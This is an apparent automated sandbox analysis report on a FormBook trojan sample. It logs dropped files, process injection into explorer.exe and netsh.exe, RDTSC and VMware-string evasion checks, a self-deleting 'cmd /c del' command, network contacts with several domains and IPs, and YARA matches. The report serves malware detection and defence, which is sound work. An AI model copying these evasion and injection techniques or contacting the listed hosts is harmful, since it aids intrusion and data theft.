          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BDAA0A1_2_00BDAA0A
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BCC5201_2_00BCC520
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BC35401_2_00BC3540
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BC8ED01_2_00BC8ED0
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041F0072_2_0041F007
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_004012082_2_00401208
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041DC7B2_2_0041DC7B
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041ED472_2_0041ED47
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00402D882_2_00402D88
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00409E5C2_2_00409E5C
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00409E602_2_00409E60
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041EE6F2_2_0041EE6F
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041D6F52_2_0041D6F5
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041DFEF2_2_0041DFEF
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00BC18D02_2_00BC18D0
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00BDAA0A2_2_00BDAA0A
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00BCC5202_2_00BCC520
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00BC35402_2_00BC3540
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00BC8ED02_2_00BC8ED0
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: String function: 00BCD960 appears 64 times
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: String function: 00BD25D4 appears 36 times
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041A360 NtCreateFile,2_2_0041A360
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041A410 NtReadFile,2_2_0041A410
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041A490 NtClose,2_2_0041A490
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041A540 NtAllocateVirtualMemory,2_2_0041A540
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041A35A NtCreateFile,2_2_0041A35A
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041A40A NtReadFile,2_2_0041A40A
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041A48C NtClose,2_2_0041A48C
          Source: 2022-571-GLS.exeReversingLabs: Detection: 30%
          Source: C:\Users\user\Desktop\2022-571-GLS.exeFile read: C:\Users\user\Desktop\2022-571-GLS.exeJump to behavior
          Source: 2022-571-GLS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\2022-571-GLS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\2022-571-GLS.exe C:\Users\user\Desktop\2022-571-GLS.exe
          Source: C:\Users\user\Desktop\2022-571-GLS.exeProcess created: C:\Users\user\AppData\Local\Temp\jsqqecy.exe "C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeProcess created: C:\Users\user\AppData\Local\Temp\jsqqecy.exe "C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\jsqqecy.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\2022-571-GLS.exeProcess created: C:\Users\user\AppData\Local\Temp\jsqqecy.exe "C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.upJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeProcess created: C:\Users\user\AppData\Local\Temp\jsqqecy.exe "C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.upJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\jsqqecy.exe"Jump to behavior
          Source: C:\Users\user\Desktop\2022-571-GLS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\2022-571-GLS.exeFile created: C:\Users\user\AppData\Local\Temp\nst2735.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/4@3/3
          Source: C:\Users\user\Desktop\2022-571-GLS.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,0_2_00402036
          Source: C:\Users\user\Desktop\2022-571-GLS.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\2022-571-GLS.exeCode function: 0_2_004043F5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004043F5
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4828:120:WilError_01
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCommand line argument: --headless1_2_00BC18D0
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCommand line argument: --unix1_2_00BC18D0
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCommand line argument: --width1_2_00BC18D0
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCommand line argument: --height1_2_00BC18D0
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCommand line argument: --signal1_2_00BC18D0
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCommand line argument: --server1_2_00BC18D0
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCommand line argument: --headless2_2_00BC18D0
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCommand line argument: --unix2_2_00BC18D0
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCommand line argument: --width2_2_00BC18D0
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCommand line argument: --height2_2_00BC18D0
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCommand line argument: --signal2_2_00BC18D0
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCommand line argument: --server2_2_00BC18D0
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Binary string: netsh.pdb source: jsqqecy.exe, 00000002.00000002.381171915.0000000001119000.00000004.00000020.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.383264606.0000000003200000.00000040.10000000.00040000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.381214615.0000000001131000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: jsqqecy.exe, 00000001.00000003.299119725.00000000029C0000.00000004.00001000.00020000.00000000.sdmp, jsqqecy.exe, 00000001.00000003.299523428.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000003.303967054.0000000001217000.00000004.00000800.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.381584152.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.382622757.00000000014CF000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.382550493.0000000003384000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.380856964.00000000031ED000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.563303711.0000000003520000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.563833806.000000000363F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: netsh.pdbGCTL source: jsqqecy.exe, 00000002.00000002.381171915.0000000001119000.00000004.00000020.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.383264606.0000000003200000.00000040.10000000.00040000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.381214615.0000000001131000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: jsqqecy.exe, 00000001.00000003.299119725.00000000029C0000.00000004.00001000.00020000.00000000.sdmp, jsqqecy.exe, 00000001.00000003.299523428.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000003.303967054.0000000001217000.00000004.00000800.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.381584152.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.382622757.00000000014CF000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.382550493.0000000003384000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.380856964.00000000031ED000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.563303711.0000000003520000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.563833806.000000000363F000.00000040.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BD5A75 push ecx; ret 1_2_00BD5A88
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041D05E push cs; ret 2_2_0041D05F
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041681D push 99159BFBh; iretd 2_2_00416822
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00417829 push esp; retf 2_2_0041782A
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00416C89 push es; ret 2_2_00416C9A
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041D4B5 push eax; ret 2_2_0041D508
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041D56C push eax; ret 2_2_0041D572
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041D502 push eax; ret 2_2_0041D508
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041D50B push eax; ret 2_2_0041D572
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0040674B push esi; iretd 2_2_0040674D
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00BD5A75 push ecx; ret 2_2_00BD5A88
          Source: jsqqecy.exe.0.drStatic PE information: section name: .00cfg
          Source: jsqqecy.exe.0.drStatic PE information: section name: .voltbl
          Source: C:\Users\user\Desktop\2022-571-GLS.exeFile created: C:\Users\user\AppData\Local\Temp\jsqqecy.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8B 0xBE 0xE5
          Source: C:\Users\user\Desktop\2022-571-GLS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 0000000002939904 second address: 000000000293990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 0000000002939B7E second address: 0000000002939B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 3156Thread sleep time: -50000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exe TID: 6032Thread sleep time: -38000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00409AB0 rdtsc 2_2_00409AB0
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeAPI coverage: 2.2 %
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeAPI coverage: 2.2 %
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\2022-571-GLS.exeCode function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405620
          Source: C:\Users\user\Desktop\2022-571-GLS.exeCode function: 0_2_00405FF6 FindFirstFileA,FindClose,0_2_00405FF6
          Source: C:\Users\user\Desktop\2022-571-GLS.exeCode function: 0_2_00402654 FindFirstFileA,0_2_00402654
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BD52F3 FindFirstFileExW,1_2_00BD52F3
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BD53A7 FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00BD53A7
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00BD52F3 FindFirstFileExW,2_2_00BD52F3
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00BD53A7 FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00BD53A7
          Source: C:\Users\user\Desktop\2022-571-GLS.exeAPI call chain: ExitProcess graph end nodegraph_0-3335
          Source: explorer.exe, 00000003.00000000.366063254.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
          Source: explorer.exe, 00000003.00000000.365236364.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.342989666.00000000059F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
          Source: explorer.exe, 00000003.00000000.366769523.0000000008394000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.351146407.000000000CDC8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&
          Source: explorer.exe, 00000003.00000000.365236364.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BD383A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00BD383A
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BD25EB GetProcessHeap,1_2_00BD25EB
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00409AB0 rdtsc 2_2_00409AB0
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BD00FE mov ecx, dword ptr fs:[00000030h]1_2_00BD00FE
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BD41ED mov eax, dword ptr fs:[00000030h]1_2_00BD41ED
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00BD00FE mov ecx, dword ptr fs:[00000030h]2_2_00BD00FE
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00BD41ED mov eax, dword ptr fs:[00000030h]2_2_00BD41ED
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0040ACF0 LdrLoadDll,2_2_0040ACF0
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BCD780 SetUnhandledExceptionFilter,1_2_00BCD780
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BD383A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00BD383A
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BCDC8D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00BCDC8D
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BCD78C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00BCD78C
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00BD383A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00BD383A
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00BCDC8D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00BCDC8D
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00BCD78C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00BCD78C
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00BCD780 SetUnhandledExceptionFilter,2_2_00BCD780

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.easyentry.vip
          Source: C:\Windows\explorer.exeNetwork Connect: 34.117.168.233 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 45.221.114.43 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.cdlcapitolsolutions.com
          Source: C:\Windows\explorer.exeNetwork Connect: 75.2.81.221 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.fulili.com
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\jsqqecy.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeThread register set: target process: 3528Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeThread register set: target process: 3528Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeProcess created: C:\Users\user\AppData\Local\Temp\jsqqecy.exe "C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.upJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\jsqqecy.exe"Jump to behavior
          Source: explorer.exe, 00000003.00000000.358106625.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.339007760.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.306844469.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Managerzx
          Source: explorer.exe, 00000003.00000000.348541007.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.363020980.0000000005C70000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.358106625.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.358106625.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.339007760.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.306844469.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.338725850.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.306396985.00000000009C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanath
          Source: explorer.exe, 00000003.00000000.358106625.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.339007760.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.306844469.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BCD9A5 cpuid 1_2_00BCD9A5
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BCD632 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_00BCD632
          Source: C:\Users\user\Desktop\2022-571-GLS.exeCode function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040324F

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Uses netsh to modify the Windows network and firewall settings
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.jsqqecy.exe.1090000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.jsqqecy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.jsqqecy.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.jsqqecy.exe.1090000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.jsqqecy.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.jsqqecy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.jsqqecy.exe.1090000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.jsqqecy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.jsqqecy.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.jsqqecy.exe.1090000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.jsqqecy.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.jsqqecy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts2
          Command and Scripting Interpreter          		Path Interception412
          Process Injection          		1
          Rootkit          		1
          Credential API Hooking          		1
          System Time Discovery          		Remote Services1
          Credential API Hooking          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Disable or Modify Tools          		11
          Input Capture          		241
